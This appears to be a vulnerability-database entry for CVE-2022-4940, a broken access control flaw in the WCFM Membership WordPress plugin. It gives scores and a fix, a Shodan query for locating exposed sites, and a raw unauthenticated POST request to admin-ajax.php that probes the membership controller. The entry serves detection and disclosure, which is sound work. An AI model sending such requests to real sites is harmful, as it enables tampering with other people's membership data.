🔙 목록으로 돌아가기

CVE-2022-4940: WCFM Membership <= 2.10.0 - Broken Access Control

TitleWCFM Membership <= 2.10.0 - Broken Access Control
Author0xanis
SeverityHigh
ImpactUnauthenticated attackers can modify membership details, approve or deny memberships, and change renewal info, potentially leading to data tampering and unauthorized access.
RemediationUpdate to WCFM Membership version 2.10.1 or later.
CVSS Score7.3
EPSS Score0.11237
CVE IDCVE-2022-4940
CWE IDCWE-862
Shodan Queryhttp.html:"wc-multivendor-membership"
Tags cve cve2022 wordpress wp-scan wp-plugin wcfm vkev woocommerce

🔍 Vulnerability Description

The WCFM Membership plugin for WordPress is vulnerable to unauthorized modification and access of data in versions up to, and including, 2.10.0 due to missing capability checks true the AJAX actions: wcfm-memberships, wcfm-memberships-manage, and wcfm-memberships-settings.

🌐 HTTP Request

GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.22
Connection: close
Content-Length: 103
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

action=wcfm_ajax_controller&controller=wcfm-memberships&wcfm_ajax_nonce=Sg1Rrz&length=10&start=0&draw=1

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-4940.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-4940.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A